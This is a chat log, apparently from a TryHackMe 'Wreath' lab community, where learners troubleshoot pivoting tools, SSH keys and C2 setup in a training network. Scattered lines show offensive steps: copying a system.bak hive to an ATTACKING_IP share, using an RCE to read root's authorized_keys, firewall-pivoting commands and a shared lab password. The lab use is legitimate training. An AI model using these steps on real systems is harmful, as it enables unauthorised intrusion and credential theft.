is your sshuttle connection up? I'm assuming you're talking about the website on .150?

I'm having problems making the chisel forward proxy. I've added 127.0.0.1 1337 to my /etc/proxychains4.conf and I'm starting chisel with "chisel client x.x.x.150:PORT_IN_WIN_FIREWALL 1337:socks, but I get an error back that the client cannot listen on 127.0.0.1:1337=>socks. Do I need to run it using proxychains?

did I perhaps not configure the proxychains4.conf correctly? I've tried with both strict and dynamic chain commented/uncommented

Actually i was starting with the .150. But the network went to sleep. After restarted i can't execute the webmin exploit, neither connect with sshuttle (i was connected before, but the same command didn't run again)

webmin exploit to .200 host

I think for most things between (roughly) steps 20-30, you'll need that sshuttle tunnel to the .150 machine running

Running this using proxychains gives me the same error

the server is already started/listening on the .150 machine (in an evil-winrm shell). I opened the port in the .150 firewall that I'm attempting to connect to

I've found the line of code in chisel that prints that error, but I'm not sure what's causing it. :/

I'm seeing some guides talk about doing a double tunnel with chisel- is that necessary in this case? Or is that over-complicating things?

okay, nevermind, looks like those errors was because my local port was in use. Switched to another port, chisel client on attacking machine seems to be running, but I didn't see a connect message on the .150 chisel server. Currently trying to figure out the foxyproxy config for this

Hm. So I think I have the foxyproxy config correct: ||socks5 type, address of 127.0.0.1 and port is 1338 (same as in my prxychains4.conf)||. But when I try to connect to any of .150, .100, or 127.0.0.1, at either ports 1338 or the port opened on the .150 machine, nothing works. With the exception of a "not found" blank page on .150:<open port>. Is that correct, or am I doing something stupid again?

normally I'd be thinking of doing a gobuster enumeration, but the writeup seems to indicate that I should be seeing a web page at this point

Only with sshuttle the page in .150 is already accessible

@acoustic mango Not sure I understand

if you setup correctly the sshuttle in your machine the page from the .150 will be accessible in your browser

The video of task 18 show this situation

yeah, I'm past that point, eldruin. I'm on task 33, trying to connect to the next machine

Oh, sorry 🤦

no problem 🙂

I readily admit I probably did something stupid or overlooked something obvious. It's most likely a PEBCAK error :).

.100:80 seems to be loading.... It was a PEBCAK error. That was about the only ip/port combo I hadn't tried.

Hi @merry robin , did those VPN events turn out to actually be a replay attack? I'm just curious if that was the case or something more innocuous.

In looking back through my logs, I actually have a few of those yesterday evening

on a different subnet than you

Apr 05 at roughly 00:23-00:36 GMT

even after creating user on remote desktop i am not getting excess

Hey, when's the exact deadline for report submissions for Wreath?

@tardy bloom it's being extended to the 17th because there aren't enough takers yet 👀
You have time

👀

Whats this invite / server for?

@vocal quail it's looking like a regular OpenVPN error for the setup that's in use for the networks, although it's definitely a weird one. There wasn't any indication that it was caused by any malicious activity certainly.

@calm wedge what does it look like?

¯_(ツ)_/¯

thought it was a bit random so was just interested....

noice!

32 pages atm

It's a link to the BC Sec discord -- the Empire developers.

ahh

so i cant connect with chisel client... i add firewall rule at port 20000 and tried other ports too but no luck.. any idea what i am doing wrong here? tnx

Have you set up the sshuttle as a relay to the first machine?

yes

?

somebody ghost pinged me?

Not in the last hour

weird ok

Try to look in the /etc/proxychains.conf if there is a proxy on the port 9090

ouu do i need it to change it to 9090 right ?😆

yeah, and then change the foxyproxy port also to that one you choose

now i get it tnx😀

ahh no luck.. still doesent work..

its firefox good for proxy or i need to do it on chrome to make this work?

You have it set to http

You started a socks5 proxy with chisel?

ohh yes i changed it to sock5 now, but still cant connect to it

Did you open the port on Windows?

There's a command for the firewall for windows

u mean this?

Wait, hang on

You can't talk to 150 can you?

Not without a pivot via 100?

i am not sure what u mean by that😆

a am on 150 now and trying to get on 100 ?

what command are you using locally to connect to your chisel server on git-serv

and is the connection accepted?

oh I'm looking up now give me a sec

I have a note about a step adding a firewall rule for that port on the prod-serv but I can't recall if that was needed

otherwise everything else looks like what I did

i dont know where is the problem.. maybe reseting will help 😩

isn't 10.200.72.0 @merry robin 's dev network?

72 yea

Oh man you saved me 😅 instead of 118 I gave 72 ... I don't know how this happend 🤦‍♂️

copy paste from the task descriptions? 😜

That will be it

hah! I've actually seen instances of people getting onto that somehow so I figured you were just doing it on that network

i cant connect to the box uproduction server using ssh key

sounds like it has s problem with ur id_rsa file

usually its errors in the file like leading spaces or similar, or its the permissions of the file

but I already changed the permissions to 600

then it's likely not that error

do I need to download both public and private keys?

can you cat the id_rsa file and paste it here so I can compare with mine?

paste the screenshot, not the text

spoiler tag it too maybe

yes sure

the key is too lengthy.It wont come completely in one screenshot

would 2 screenshots be fine?

yeah I guess

thats fine

okk

ok that looks fine to me

can you chmod +600 id_rsa again and test that seems strange

did

Do have to login wiht twreath user

nop

i'd rename that key and try make it again from scratch maybe

sometimes they are a bit funny for me but I haven't had any problems lately

i downlaoded the key again but still

I l ty renaming it

why is it telling me invalid format

Doesn't really matter, someone probably removed the key on the box

so I have to reset I guess

I logged in to box using the exploit but it still shows that the key is there

Check if the right key is authorised

@open nebula use the CVE RCE to cat /root/.ssh/authorized_keys please

how?

@merry robin Am I able to update my report on google drive if there is something I would like to change? Or no editing once its submitted.

@lyric bane yeah, just send a new link if it changes.

I'll always look at the last one submitted by each person and reject the others anyway

Thanks, I updated it and the original link should work.

Is there better way to move the system.bak to my local system than using impacket?
I always get "An unexpected network error occurred
0 file(s) moved"

Can you show a screenshot?

i cannot upload a png here it seems. Anyway I am just using the command move system.bak \ATTACKING_IP\share\system.bak

!docs verify

Follow those steps

thanks

the impacket server

Oh boy, someone messed up the network lol

I installed starkiller, all is working fine in cli but in browser i get only white blank page

Anyone welp?

In... browser?

Yes

What's the browser got to do with it?

Don't you start the appimage and connect it to empire?

how to do that?

It's just like a binary

Task and question number?

Task 23

Command and Control Empire: Installation

Notice how this is not a browser

You need to start starkiller.

Then enter the credentials in starkiller.

ook but what's that for?

Like I said, enter the credentials in starkiller

k

ya logged in

thenks

sooooo i am doing wreath again and the id_rsa key on .200 doesn't work, subnet: 96
it doesnt even work to log in to localhost from 10.200.96.200 so its obviously something wrong

i might be doing something wrong haha

Hey

https://i.imgur.com/MrM3644.png

How to do this mind map please

??

we can draw this in an application to draw the infrastructure of the network ?

If you want

without cobalt strike ?

That graph is powered by tryhackme, if that's what you mean

You can draw a graph on your own if you want.

You can mark it however you want

Yess i know but I want to an application to do that with the beautiful colors and more... same that the THM's graph

So get cobalt strike or make one?

Not C2 just an app to make graph like that

Ok

So make a graph like that.

THM does it with HTML5 I'm sure.

Okey thanks you

@strange bison it can be cool if I do graphs with GNS3 no ?

but it's not beautiful

Do some googling for images to edit and if your on window use paint to create your own graph representation of the network.

i have 1 error connecting to host 10.200.96.200

no root to host

route

are you connected to the vpn?

if so i would recommend regenerate your .ovpn

You won't be able to talk to .200 unless you have a pivot, right?

i was doing the exploit to the git-serv 5 min ago

then the connection stopped

network went to sleep?

i have restarted and than tgry to ssh to prod-serv

i always get ssh: connect to host 10.200.96.200 port 22: No route to host

sounds to me like either the network went to sleep, or perhaps somebody broke the .200 machine somehow- changed firewall rules, killed a service, something like that

if you're sure the network is still running, maybe try another nmap scan on the .200 machine? See if the results are different than your previous scan?

i try tnx

What does it mean?

After 6 days we can't use it?

#wreath-network message

Please read the pins 🙂

Yeah i just read the first 3 4 modules

My mistake 😅

I panicked that it's going away lolz

https://memegenerator.net/img/instances/60945043/must-go-faster-must-go-faster.jpg

Muiri- there's a sentence in task 36 that reads a bit weird. "for all we know, it will pick up any kind of PHP default PHP webshell that we upload..."

Oops

Fixed

It's okay, you're allowed to make mistakes. But that's your allotment for the month! 😉

I blame my testers for not picking up on it /s

I blame muir for changing it after we tested it and you can't prove otherwise

Yes, clearly this room was not very well tested before being released into the wild </sarcasm> 😉

Muiri, have you considered writing a book(s)? or creating a class?

Is there any way we can see what the defender/AV alert would look like for the bonus item in task 40?

Hm. I think the webserver on my .100 machine has died. I think I might have killed it

I can load the .100:80 page, but it's verrrrry slow (takes several minutes to load, it seems). But I can't load the /resources page anymore. And I can't execute my nc.exe (I accidentally killed my reverse shell with ctrl-c, but now I can't get it back)

I'll try to poke it again tomorrow. Maybe the network needs rest

nvm silly mistake

Can someone explain me why I am getting enable to locate starkiller ?

means we can download it using sudo apt install

need some help ssh -i id_rsa root@10.200.96.200

root@10.200.96.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

does it have anything else

like 'invalid format' or 'incorret permissions'

no

it works perfectly until yesterday

oh

can you check authorised keys on the host again using the exploit

and see if yours matches?

maybe it changed

it shouldn't tho

might need Muiri if you are connected to the VPN etc correctly

ok i reexploit and redownload the ssh

So its solution for me was to re download (copy the contents of) the id_rsa file

If you will look in github it will suggest to edit gssapi files which might work, however i dont think it will be required in the network.

Just finished the room, learned a ton of new things, thanks you all, big kudos to Muiri 😁

i am taking notes and screeshot evry step, now i have an account on git-serv 🙂

is it "ThreepwoodMightyPirate!"

😉

I love Monkey Island games, so great

when i was young i had a lot of fun eith lucas art games

me too 🙂

Is it possible that empire still does not work as it should with that http_hop?

it seems like this time the agent won't even reach out to your attacking machine

The deadline has been extended to the 17th?

Which deadline?

To submit a report of the network.

The new 8.2 release should have it fixed. It not connecting back at all sounds like a firewall problem.

so again when the network restart the ssh key become invalid

i try to reexploit but i can't becose port 10000 is not up

Well, ive opened the firewall port, to make sure i created another exception and switched to this other port

but you can reach the host in general right?

yes

i can ping and nmap

have you updated the exploit with the new ip?

10.200.96.200

im not on the right network, i wouldn't know unfortunatley

dunno why ssh key is changing every restart

and Miniderv is down

Actually the SSH Key shouldn't change. Not after a normal Restart, just if you are connected to a different Network

I am using the same key for days now

me too until yesterday

if i am connected to a different network ehy i can ping or nmap...

The key won't change. Make sure it's had a few minutes to restart fully though

i cant't see port 10000

i try again later network is 53 min up

stop again in 35 min

GbJ7oAQ232an8AAAARcm9vdEB0bS1wcm9kLXNlcnYBAg== <- last row of ssh key now

J6xOGGwBVPxOZrAAAADnJvb3RAcHJvZC1zZXJ2AQIDBA== <- this morning

──(root💀kali)-[/tryhackme/wreath]
└─# ssh -i rsa1 root@10.200.96.200
-bash: /usr/libexec/grepconf.sh: /bin/sh: bad interpreter: No such file or directory
-bash: /usr/libexec/grepconf.sh: /bin/sh: bad interpreter: No such file or directory
-bash: /usr/libexec/grepconf.sh: /bin/sh: bad interpreter: No such file or directory
[root@prod-serv ~]#

and port 10000 disappared...

something is seriously messed up with your machine

/bin/sh doesnt exist

So I've noticed that the first time I run sshuttle ... &, it only works while the process is active. If I ctrl-z to background it, I can't load the .150 web page anymore. But if I kill it and run it again, it seems stable. Is that something I'm doing wrong, or just a quirk of the program, or something else?

Would it be possible to check the web server on the .92.100 machine? It's still misbehaving for me. Takes forever to load the main page, can't seem to load /resources or my shell at all

Hey, is someone from Brazil?

@dry pendant Ctrl + Z stops the process -- it doesn't background it.

thought that was ctrl+c

Ctrl + Z then bg would background

Ctrl + C terminates it

ah. well that was half my problem, then

Think of Ctrl + Z almost like a suspension. It doesn't operate, but it's still there

https://superuser.com/questions/594508/whats-the-difference-between-sigkill-and-sigstop

Ctrl + Z is sigstop, Ctrl + C is sigkill (iirc -- might be sigterm)

gotcha. That definitely helps. Totally my fault, then

Must be sigterm actually

Given it can be caught

this other issue I'm having though I think is a broken network. even if I just curl http://10.x.x.100:80/ (or variations on port and slash), I get empty reply (code 52)

Yeah, not sure on that one. I don't have my kali active to check just now :(

gotcha. Anything I can do to check it or restart that service or something, short of voting for a network reset?

I have a chisel server started on the .150 machine through evil-winrm, and a chisel client on my local machine, which reports that it is connected. I opened the firewall port for that yesterday, and was able to get a revshell from .100, but I accidentally killed it with ctrl-c yesterday and haven't been able to get it back since

hm. Running the invoke-portscan command on .150 for the .100 machine reports the system is dead, no ports open or closed

https://i.kym-cdn.com/photos/images/original/000/715/142/f6c.jpg 😢

Yeah, sounds like a reset there I'm afraid

yeah, already voted. 2 votes shy, will vote again when I can

yeah, its sigterm because openvpn reports ctrl-c (sigterm)

haha

Hey guys, im on task 17, git server enumeration. I successfully transfer the static nmap binary to the target machine, when I run it however I get this response .syntax error near unexpected token new line
please help lol

Huh?

Can u share a ss

@bitter drift

I did successfully finished this lab and when did I try to revise again for my notes I have problems executing the 43777.py file it saying line 18 error, did try on the local machine and virtual hack machine as well any suggestion on what is wrong??

possibly something on line 18?

Yes but it works before

I did follow guidance and works before and now don't

Read some article about a new update pip3 problems

hmm I don't think it'd be that

none of the IP's have changed since you originally did it I assume?

can you manually copy the exploit agan and name it something else and edit it and try that?

Same ip

I did it

I see, not sure then sorry 😦

Thanks anyway👍

what's the full error?

Sorry boys

I think i just killed it

There are several networks, if you are saying something specific to the network that you're on you need to specify what the 3rd octet of the IP is

My bad.. I think i just killed the 10.200.92.200 machine

With empire

agent

how can i exit from empire background job ? do i have to kill the job ?

done with jobs

kill %number

so is wreath a real test or is it a guidedish tour?

both

It's walked through

ty 🙂

If you complete it without the walkthough, you might break something for other users which is quite inconsiderate

might have to reserve some time for it this weekend then

lol, even if you follow the walktrough you may break something 😉

yes 🙂

@strange bison Can you check if the 10.200.92.200 machine is up?

No

ok 🙂

Because I'm not on that network

the second time you connect to the gitserver with hash i need only sshutle and winrm right ?

i don't need to reopen firewall...

Correct

tnx

Which IP does your network have?

10.200.x.200

yes

Which is in the 3rd?

97?

92

96

kj 🙂 Careful with the Empire agent

I just killed the 92 network

🙂

i have installed enpire just now

i am reading all before to try...

it's metasploit like i think...

If you copy the launcher.sh

make sure to NOT COPY THE RM -F $0$ thing

ok

i speak out of experience xD

i know 🙂

@dusky ridge what happened? Which task was this on?

Empire launcher.sh

My mistake was copying the rm -f $0$ thing

and executing it

which task?

empire has some issues atm

they will release a patch soon

No. 27

what issues are you having now?

Offline system

systems

cannot ssh into 200 system etc.

well, the web server there is still up

let me see if i can ssh in, hang on

yeah, I'm in to .92.200

wtf

were you able to ssh in before? You sure the id_rsa is good?

Yes

Uhm..

can you ping the system?